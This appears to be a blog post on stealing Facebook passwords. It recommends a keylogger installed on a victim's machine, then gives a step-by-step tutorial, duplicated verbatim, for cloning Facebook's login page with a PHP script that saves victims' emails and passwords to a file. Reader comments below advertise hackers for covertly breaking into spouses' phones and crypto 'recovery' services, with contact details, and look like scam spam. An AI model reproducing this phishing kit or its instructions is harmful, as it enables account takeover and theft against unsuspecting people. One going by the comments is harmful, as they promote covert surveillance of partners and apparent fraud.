Method One: Keylogger
One of the easiest ways to obtain a password is to install the Keylogger on the victim computer if you happened to have physical access to it. Keylogger is a program that records each keystroke on the keyboard that the user types, most often without their knowledge. The software has to be manually installed on the victim's computer. Once installed it will automatically start capturing keystroke on the computer and will remain undetected. There is a free keylogger that you can download for free that will record keystroke and send it to you via email.
Method Two: Phishing
This attack method can be difficult because you will have to first create a fake web page that looks exactly like Facebook and second you will have to perform a social engineer in order to trick the victim into visiting your fake Facebook page and entering the username and password. To create a fake Facebook login page follow the tutorial below.
1. Go to Facebook.com. At the login page right-click anywhere and select View page source.
2. Once the View page source is opened. Press Ctrl + A to highlight all of the code. Now press Ctrl + C to copy all of the code on the page.
3. Open a notepad and paste the code into the notepad.
4. Now inside the notepad press Ctrl + F to open the find tool.
5. In the find window, type in action= and press Enter. The find tool will look for the first action=. This is where we will need to make some changes to the code in order to record the victim's password once they typed it in and press Enter.
action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110"
method="post"
NOTE: Your screen might be a little different than mine depending on if Facebook updated their login screen but it should still work.
6. Once you found the code like the one displayed above, erase the code and change it to the code below.
action="log.php"
method="GET"
7. Now save this as index.php and open a new notepad. When you click on File Save As make sure you select Save types as All file before you give the file the name index.php
8. Copy and paste the code below to the new the notepad that you just opened and save it as log.php
<?php
header("Location: http://www.facebook.com/home.php? ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
9. Now we need to test to see if this is working before we upload the two php files to a web server. If you are doing this on a Windows machine I recommend downloading XAMPP and install it. This will allow you to turn your Windows machine into a web server to run PHP.
If you are doing this on a Linux machine just make sure you install Apache, PHP and MySQL and upload the two PHP files to the www directory.
10. Since I am doing this on my Windows machine I will show you where to put the two PHP files so you can test to see if your phishing page is working. After you have installed the XAMPP copy the two PHP files to the C:\xampp\htdocs directory. Now open the XAMPP control panel and start the XAMPP server
11. Now open your favorite browser, in the address bar type in localhost and press Enter. You should now be able to see the fake Facebook page you created like the one I have below. Notice we can tell it is fake because in the address bar it says localhost instead of facebook.com. And if this were to be on a web server it would have a domain name different from facebook.com
In the email box type in an email and in the password type in any password and click Login.
12. Once you clicked the Login go back into the C:\xampp\htdocs directory and should now see a text file called passwords.txt. Open this file and you should be able to see the email and password you entered.
1. Go to Facebook.com. At the login page right-click anywhere and select View page source.
2. Once the View page source is opened. Press Ctrl + A to highlight all of the code. Now press Ctrl + C to copy all of the code on the page.
3. Open a notepad and paste the code into the notepad.
4. Now inside the notepad press Ctrl + F to open the find tool.
5. In the find window, type in action= and press Enter. The find tool will look for the first action=. This is where we will need to make some changes to the code in order to record the victim's password once they typed it in and press Enter.
action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110"
method="post"
NOTE: Your screen might be a little different than mine depending on if Facebook updated their login screen but it should still work.
6. Once you found the code like the one displayed above, erase the code and change it to the code below.
action="log.php"
method="GET"
7. Now save this as index.php and open a new notepad. When you click on File Save As make sure you select Save types as All file before you give the file the name index.php
8. Copy and paste the code below to the new the notepad that you just opened and save it as log.php
<?php
header("Location: http://www.facebook.com/home.php? ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
9. Now we need to test to see if this is working before we upload the two php files to a web server. If you are doing this on a Windows machine I recommend downloading XAMPP and install it. This will allow you to turn your Windows machine into a web server to run PHP.
If you are doing this on a Linux machine just make sure you install Apache, PHP and MySQL and upload the two PHP files to the www directory.
10. Since I am doing this on my Windows machine I will show you where to put the two PHP files so you can test to see if your phishing page is working. After you have installed the XAMPP copy the two PHP files to the C:\xampp\htdocs directory. Now open the XAMPP control panel and start the XAMPP server
11. Now open your favorite browser, in the address bar type in localhost and press Enter. You should now be able to see the fake Facebook page you created like the one I have below. Notice we can tell it is fake because in the address bar it says localhost instead of facebook.com. And if this were to be on a web server it would have a domain name different from facebook.com
In the email box type in an email and in the password type in any password and click Login.
12. Once you clicked the Login go back into the C:\xampp\htdocs directory and should now see a text file called passwords.txt. Open this file and you should be able to see the email and password you entered.
Can i useing .
ReplyDeleteMobile phonefor 2nd method
I am sure you can but its wont be easy because you you dont have a mouse
DeleteMy husband and I have been married for four years, and in that time, we’ve had our share of ups and downs. Recently, things have been strained between us and I began to suspect that he was cheating on me. I wasn’t sure how to go about finding out the truth, but I knew that I needed to do something.
ReplyDeleteThat’s when I came across this article about tracking my husband’s phone. It sounded like exactly what I needed to do. And it worked! I was able to see all of the texts and calls that he was making and receiving, and I even found out who he was talking to.
I confronted him about what I had found, and he finally admitted that he had been cheating on me. I’m so glad that I took the time to track his phone because now I know the truth and can move on with my life.
If you’re suspicious about your husband’s behavior, then I encourage you to read this article and consider tracking his phone. It could be the best decision that you ever make.contact, Femethicalhacker@gmail.com,
I caught my husband so many times through his chats and all about cheating on me and when i told him he always claims that he has changed and all..right now he hides his phone from me and i still guess he is cheating cause i could not break into his phone any more so i was referred to a hacker named Henry Clark who i ran to for help and this hacker was able to break into his phone and proved me with the access to my husband phone without my spouse knowing about the hack..right in my phone i have all my husband phone daily activities in my phone i got to read all his chats, text, calls, whats-app, Facebook, and many more this hacker is really great thank you.
ReplyDeleteDid you find this review helpful? contact him via gmail, Henryclarkethicalhacker@gmail.com and you can text, call and whatsapp him on +1813-421-1326..
Tested and trusted..
Good day everyone, I’m Doris Keeton and I wish to bring to your attention the service of the Spyweb Cyber team who helped me recover my stolen money. A few weeks ago, I was contacted on Instagram by someone pretending to be an account manager and forex investor, I was convinced to invest a huge sum of money through Bitcoins and Ethereum, I sent a total of $77,000 to this person and I was scammed off my money. I was really sad and frustrated, but while I was going through the pain of losing my money, a friend of mine told me about Spyweb Cyber recovery team, a genuine and reputable team with plenty of good reviews, I contacted them immediately and provided all the information they needed, and to my surprise, they recovered all the money that I lost. I highly recommend Spyweb if you need any assistance in recovering your money from these scammers.
ReplyDelete(Spyweb@cyberdude. com)
(Contact@spyweb. tech)